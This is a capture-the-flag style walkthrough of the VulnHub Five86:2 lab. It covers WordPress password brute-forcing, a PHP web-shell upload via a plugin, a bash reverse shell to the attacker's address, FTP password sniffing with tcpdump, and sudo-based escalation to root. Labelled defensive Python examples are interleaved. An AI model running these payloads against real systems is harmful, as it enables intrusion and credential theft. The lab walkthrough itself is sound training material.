VulnHub Five86:2 walkthrough
Introduction
I recently started doing VulnHub machines, so I'm leaving write-ups as notes. The box I tried is this one:
www.vulnhub.com
I haven't done five86-1 yet, so I plan to do it next time.
For VulnHub enumeration I referred to the following: kakyouim.hatenablog.com
Enumeration
First, find the target's IP address.
sudo netdiscover -r $ip
Change the $ip part each time (e.g. 192.168.100.0/24).
Once it was found, I added it to /etc/hosts as five86-2.
Next, scan the target.
$ nmap -p- -A -sV five86-2
Host is up (0.0017s latency).
Not shown: 65532 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Five86-2 – Just another WordPress site
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds
Visiting the site showed a page built with WordPress. For a start, enumerate user names with wpscan.
$ wpscan --url five86-2 -e u

        WordPress Security Scanner by the WPScan Team
                       Version 3.7.8
          Sponsored by Automattic - https://automattic.com/
          @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://five86-2/
[+] Started: Fri Feb 28 15:48:56 2020

Interesting Finding(s):

[+] http://five86-2/
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://five86-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://five86-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://five86-2/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://five86-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Latest, released on 2019-12-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://five86-2/index.php/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>
 |  - http://five86-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://five86-2/wp-content/themes/twentynineteen/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
 | Style Name: Twenty Nineteen
 | Style URI: https://github.com/WordPress/twentynineteen
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:00 <===========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barney
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gillian
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] stephen
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Feb 28 15:48:59 2020
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 13.343 KB
[+] Data Received: 549.372 KB
[+] Memory used: 126.762 MB
[+] Elapsed time: 00:00:02
I couldn't figure out what to do from here, so for now I tried to see whether I could crack passwords.
I downloaded a wordlist at random. user.txt is as follows:
$ cat user.txt
admin
gillian
peter
barney
stephen
$ wpscan --url five86-2 -P ./wordlist -U ./user.txt --threads 10
~~~ omitted ~~~
[SUCCESS] - barney / spooky1
[SUCCESS] - stephen / apollo1
This took quite a while.
Now that barney's and stephen's passwords are known, log in to WordPress: http://five86-2/wp-login.php
Looking at Plugins, only one is active.
Googling "insert or embed articulate content into wordpress trial exploit" turned up this site: www.exploit-db.com
For now, run the following to create a ZIP file:
$ echo "<html>hello</html>" > index.html
$ echo '<?php echo system($_GET["cmd"]); ?>' > index.php
$ zip poc.zip index.html index.php
Edit the Sample Page from Pages. In the edit screen, select e-learning. Selecting e-learning changes the bottom of the page as shown below. Under upload, click "choose your zip file" and upload the poc.zip just created.
Press INSERT without changing the settings, and it looks like the following. Access: http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html
Since "hello" is displayed, index.html and index.php seem to have been placed.
Set up a reverse shell.
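As an added example (not code from the write-up or from the plugin), here is the server-side check that would have rejected poc.zip before it was unpacked under wp-content/uploads/: it refuses archive entries the web server would execute, paths that escape the extraction directory, and symlinks. The archives are constructed in memory, and the extension list is an assumption about what the server's PHP handler runs.

```python
import io
import posixpath
import stat
import zipfile

# Assumption: the web server executes any file whose name carries one of
# these extensions, including as a middle extension ("shell.php.jpg").
EXECUTABLE_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps"}


def zip_problems(data: bytes) -> list:
    """Return reasons to reject the archive; an empty list means it is acceptable."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = posixpath.normpath(name).split("/")
            # Absolute paths or ".." components escape the extraction directory.
            if name.startswith(("/", "\\")) or "\\" in name or ".." in parts:
                problems.append(f"path escapes target directory: {name!r}")
            # A symlink entry could point a web-served name at any file on disk.
            if stat.S_ISLNK(info.external_attr >> 16):
                problems.append(f"symlink entry: {name!r}")
            # Anything PHP would run becomes a web shell once it sits under uploads/.
            exts = posixpath.basename(name).lower().split(".")[1:]
            if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
                problems.append(f"server-executable file: {name!r}")
    return problems


def build_zip(entries: dict) -> bytes:
    """Build a ZIP in memory (used only to construct the samples below)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: the shape of the poc.zip from the write-up, a benign
# e-learning package, and a traversal attempt.
POC_ZIP = build_zip({"index.html": b"<html>hello</html>",
                     "index.php": b"<?php /* constructed placeholder */ ?>"})
CLEAN_ZIP = build_zip({"index.html": b"<html>hello</html>", "story.js": b"// player"})
TRAVERSAL_ZIP = build_zip({"../../outside.txt": b"x"})
```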
$ ncat -lvp 1234
Set up the reverse shell by requesting http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=%2Fbin%2Fbash -c 'bash -i >%26 %2Fdev%2Ftcp%2F自IP%2F1234 0>%261' (replace 自IP with your own address).
I wasn't sure what to do from here either, so I tried to see whether I could log in with the WordPress accounts.
<-content/uploads/articulate_uploads/poc$ su stephen
Password: apollo1
ls
index.html index.php
stephen worked, but barney didn't.
Switch to a TTY shell.
python3 -c 'import pty; pty.spawn("/bin/sh")'
Look for clues.
$ id
uid=1002(stephen) gid=1002(stephen) groups=1002(stephen),1009(pcap)
$ find / -perm -u=s -type f 2>/dev/null
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/nc.traditional
/usr/bin/at
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
$ cd /home
$ ls -la
total 40
drwxr-xr-x 10 root    root    4096 Jan  9 04:49 .
drwxr-xr-x 20 root    root    4096 Jan  8 22:57 ..
drwx------  2 barney  barney  4096 Jan 13 11:19 barney
drwx------  2 george  george  4096 Jan 13 11:19 george
drwx------  2 gillian gillian 4096 Jan 13 11:19 gillian
drwx------  2 john    john    4096 Jan 13 11:19 john
drwx------  3 paul    paul    4096 Jan 13 11:19 paul
drwx------  4 peter   peter   4096 Jan 13 11:19 peter
drwx------  2 richard richard 4096 Jan 13 11:19 richard
drwx------  3 stephen stephen 4096 Feb 28 05:27 stephen
No idea...
Recall the nmap results.
$ nmap -p- -A -sV five86-2
Host is up (0.0017s latency).
Not shown: 65532 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Five86-2 – Just another WordPress site
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds
FTP is running.
$ ip address
~~~ omitted ~~~
4: br-eca3858d86bf: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:e9:7c:0d:c8 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-eca3858d86bf
       valid_lft forever preferred_lft forever
    inet6 fe80::42:e9ff:fe7c:dc8/64 scope link
       valid_lft forever preferred_lft forever
6: veth5661bf0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-eca3858d86bf state UP group default
    link/ether ae:65:fb:03:f2:93 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::ac65:fbff:fe03:f293/64 scope link
       valid_lft forever preferred_lft forever
Try tcpdump.
$ timeout 100 tcpdump -w ftp.pcap -i veth5661bf0
tcpdump: listening on veth5661bf0, link-type EN10MB (Ethernet), capture size 262144 bytes
45 packets captured
45 packets received by filter
0 packets dropped by kernel
$ tcpdump -r ftp.pcap
tcpdump -r ftp.pcap
reading from file ftp.pcap, link-type EN10MB (Ethernet)
05:15:06.660136 IP 172.18.0.10.ftp-data > five86-2.35935: Flags [S], seq 3726234348, win 64240, options [mss 1460,sackOK,TS val 2061727388 ecr 0,nop,wscale 7], length 0
05:15:11.779988 ARP, Request who-has five86-2 tell 172.18.0.10, length 28
05:15:11.780055 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28
05:16:01.411151 IP five86-2.43146 > 172.18.0.10.ftp: Flags [S], seq 1507466548, win 64240, options [mss 1460,sackOK,TS val 1051112056 ecr 0,nop,wscale 7], length 0
05:16:01.411199 IP 172.18.0.10.ftp > five86-2.43146: Flags [S.], seq 2912316704, ack 1507466549, win 65160, options [mss 1460,sackOK,TS val 2061782139 ecr 1051112056,nop,wscale 7], length 0
05:16:01.411242 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 1, win 502, options [nop,nop,TS val 1051112056 ecr 2061782139], length 0
05:16:01.413663 IP 172.18.0.10.32812 > _gateway.domain: 20351+ PTR? 1.0.18.172.in-addr.arpa. (41)
05:16:01.415003 IP _gateway.domain > 172.18.0.10.32812: 20351 NXDomain* 0/0/0 (41)
05:16:01.416604 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 1:58, ack 1, win 510, options [nop,nop,TS val 2061782145 ecr 1051112056], length 57: FTP: 220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10]
05:16:01.416649 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 0
05:16:01.417335 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 1:12, ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 11: FTP: USER paul
05:16:01.417347 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 12, win 510, options [nop,nop,TS val 2061782145 ecr 1051112062], length 0
05:16:01.417777 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 58:90, ack 12, win 510, options [nop,nop,TS val 2061782146 ecr 1051112062], length 32: FTP: 331 Password required for paul
05:16:01.417792 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 0
05:16:01.417864 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 12:33, ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 21: FTP: PASS esomepasswford
05:16:01.417871 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 33, win 510, options [nop,nop,TS val 2061782146 ecr 1051112063], length 0
05:16:01.429785 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 90:115, ack 33, win 510, options [nop,nop,TS val 2061782158 ecr 1051112063], length 25: FTP: 230 User paul logged in
05:16:01.429807 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0
05:16:01.429844 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 33:41, ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 8: FTP: TYPE I
05:16:01.429856 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0
05:16:01.429949 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 115:134, ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 19: FTP: 200 Type set to I
05:16:01.429955 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0
05:16:01.430004 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 41:66, ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 25: FTP: PORT 172,18,0,1,184,215
05:16:01.430015 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0
05:16:01.430123 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 134:163, ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 29: FTP: 200 PORT command successful
05:16:01.430130 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0
05:16:01.430149 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 66:81, ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 15: FTP: STOR file.txt
05:16:01.430158 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 81, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0
05:16:01.430364 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061782158 ecr 0,nop,wscale 7], length 0
05:16:02.436063 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061783164 ecr 0,nop,wscale 7], length 0
05:16:04.452086 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061785180 ecr 0,nop,wscale 7], length 0
05:16:06.564573 ARP, Request who-has 172.18.0.10 tell five86-2, length 28
05:16:06.564543 ARP, Request who-has five86-2 tell 172.18.0.10, length 28
05:16:06.565923 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28
05:16:06.565945 ARP, Reply 172.18.0.10 is-at 02:42:ac:12:00:0a (oui Unknown), length 28
05:16:08.612344 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061789340 ecr 0,nop,wscale 7], length 0
05:16:12.196872 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 3033351166:3033351225, ack 69910674, win 510, options [nop,nop,TS val 2061792925 ecr 1050992285], length 59: FTP: 425 Unable to build data connection: Connection timed out
05:16:12.196978 IP five86-2.43144 > 172.18.0.10.ftp: Flags [.], ack 59, win 502, options [nop,nop,TS val 1051122842 ecr 2061792925], length 0
05:16:12.198035 IP five86-2.43144 > 172.18.0.10.ftp: Flags [P.], seq 1:7, ack 59, win 502, options [nop,nop,TS val 1051122843 ecr 2061792925], length 6: FTP: QUIT
05:16:12.198077 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 7, win 510, options [nop,nop,TS val 2061792926 ecr 1051122843], length 0
05:16:12.198633 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 59:73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 14: FTP: 221 Goodbye.
05:16:12.199019 IP 172.18.0.10.ftp > five86-2.43144: Flags [F.], seq 73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 0
05:16:12.202694 IP five86-2.43144 > 172.18.0.10.ftp: Flags [F.], seq 7, ack 74, win 502, options [nop,nop,TS val 1051122848 ecr 2061792927], length 0
05:16:12.202754 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 8, win 510, options [nop,nop,TS val 2061792931 ecr 1051122848], length 0
05:16:16.803932 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061797532 ecr 0,nop,wscale 7], length 0
Someone seems to be logging in as paul with esomepasswford, so:
$ su paul
su paul
Password: esomepasswford
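What made this capture possible is stephen's membership in the pcap group, and the FTP login crossing the bridge is in the clear. As an added example (not part of the write-up), a small detector over tcpdump -r output that reports completed FTP logins without ever storing the password; the sample lines are constructed in the format of the capture above, with a made-up password.

```python
import re

# One tcpdump -r line per packet; only the fields this check needs are captured.
PKT = re.compile(r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): .*?FTP: (?P<ftp>.+)$")


def audit_ftp_logins(lines):
    """Return one event per completed FTP login attempt seen in tcpdump output.

    Sessions are keyed by (client endpoint, server endpoint).  The password
    itself is never stored; only its length is kept for the report.
    """
    sessions = {}
    events = []
    for line in lines:
        m = PKT.match(line.strip())
        if not m:
            continue
        ts, src, dst, msg = m.group("ts", "src", "dst", "ftp")
        if msg.startswith("USER "):
            sessions[(src, dst)] = {"user": msg[5:].strip(), "pass_len": 0}
        elif msg.startswith("PASS "):
            sess = sessions.setdefault((src, dst), {"user": None, "pass_len": 0})
            sess["pass_len"] = len(msg[5:].strip())
        elif msg[:3] in ("230", "530"):
            # Server reply: the session key is reversed (client, server).
            sess = sessions.pop((dst, src), None)
            if sess is None:
                continue
            events.append({
                "time": ts, "client": dst, "server": src,
                "user": sess["user"], "password_chars": sess["pass_len"],
                "result": "success" if msg.startswith("230") else "failure",
                "finding": "cleartext FTP credentials on the wire",
            })
    return events


# Constructed sample in the format of the capture above; the password is made up.
SAMPLE_LINES = """\
05:16:01.416604 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 1:58, ack 1, win 510, length 57: FTP: 220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10]
05:16:01.417335 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 1:12, ack 58, win 502, length 11: FTP: USER paul
05:16:01.417777 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 58:90, ack 12, win 510, length 32: FTP: 331 Password required for paul
05:16:01.417864 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 12:33, ack 90, win 502, length 21: FTP: PASS sample-secret
05:16:01.429785 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 90:115, ack 33, win 510, length 25: FTP: 230 User paul logged in
05:16:20.000000 IP five86-2.43200 > 172.18.0.10.ftp: Flags [P.], seq 1:13, ack 58, win 502, length 12: FTP: USER guest
05:16:20.000100 IP five86-2.43200 > 172.18.0.10.ftp: Flags [P.], seq 13:24, ack 90, win 502, length 11: FTP: PASS wrong
05:16:20.000200 IP 172.18.0.10.ftp > five86-2.43200: Flags [P.], seq 90:120, ack 24, win 510, length 30: FTP: 530 Login incorrect.
""".splitlines()
```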
It's not in the write-up, but I did my usual routine below.
paul@five86-2:~$ sudo -l
Matching Defaults entries for paul on five86-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User paul may run the following commands on five86-2:
    (peter) NOPASSWD: /usr/sbin/service
Looks like I can become peter.
paul@five86-2:/$ sudo -u peter /usr/sbin/service /bin/bash
/bin/bash: unrecognized service
Maybe not.
paul@five86-2:~$ sudo -u peter /usr/sbin/service ../../bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

peter@five86-2:/$
It worked, but I don't know why the first one fails and the second works. If anyone knows, please tell me!
peter@five86-2:/home/peter$ sudo -l
Matching Defaults entries for peter on five86-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on five86-2:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/passwd
Looks like I can become root.
peter@five86-2:/home/peter$ sudo -u root /usr/bin/passwd root
New password: root
Retype new password: root
passwd: password updated successfully
peter@five86-2:/home/peter$ su root
Password: root
root@five86-2:/home/peter#
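As an added example (not from the write-up), a sudoers audit over sudo -l output like the two above: it walks the run-as edges and reports chains such as paul to peter to root, which is the check a defender would run over their own sudoers to catch two individually harmless-looking NOPASSWD rules composing into root. It conservatively treats any permitted command as control of the run-as account; the sample texts are reconstructed from the outputs on this page.

```python
import re
from collections import deque

# A rule line from "sudo -l": "(runas[ : group]) [TAG: ...] command"
RULE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(user, text):
    """Return (user, runas, needs_password, command) for each rule in sudo -l output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        line = line.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            runas = m.group("runas").split(":")[0].strip()
            # "ALL" as run-as user includes root, which is what matters for the audit.
            runas = "root" if runas == "ALL" else runas
            rules.append((user, runas, "NOPASSWD:" not in m.group("tags"), m.group("cmd").strip()))
    return rules


def escalation_paths(rules, start, known_passwords=frozenset()):
    """BFS over run-as edges.  Conservative assumption: any permitted command gives
    control of the run-as account.  A rule that needs a password is usable only
    when the invoking account's password is in known_passwords."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        user = queue.popleft()
        for u, runas, needs_pw, cmd in rules:
            if u != user or runas in parent or (needs_pw and user not in known_passwords):
                continue
            parent[runas] = (user, cmd)
            queue.append(runas)
    paths = {}
    for target in parent:
        hops, cur = [], target
        while parent[cur] is not None:
            via, cmd = parent[cur]
            hops.append((via, cur, cmd))
            cur = via
        paths[target] = hops[::-1]  # ordered from start to target
    return paths


# Constructed from the two "sudo -l" outputs above (Defaults lines omitted).
PAUL = "User paul may run the following commands on five86-2:\n    (peter) NOPASSWD: /usr/sbin/service"
PETER = ("User peter may run the following commands on five86-2:\n"
         "    (ALL : ALL) ALL\n    (root) NOPASSWD: /usr/bin/passwd")
RULES = parse_sudo_l("paul", PAUL) + parse_sudo_l("peter", PETER)
```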
Got root, so cat the flag and we're done.
root@five86-2:/home/peter# cd /root
cd /root
root@five86-2:~# ls
ls
snap  thisistheflag.txt
root@five86-2:~# cat thisistheflag.txt
Thoughts
It was hard. It was actually much messier than this, but tidied up somewhat, this is how it went. With more practice, maybe this level will go smoothly.
Next might be this one.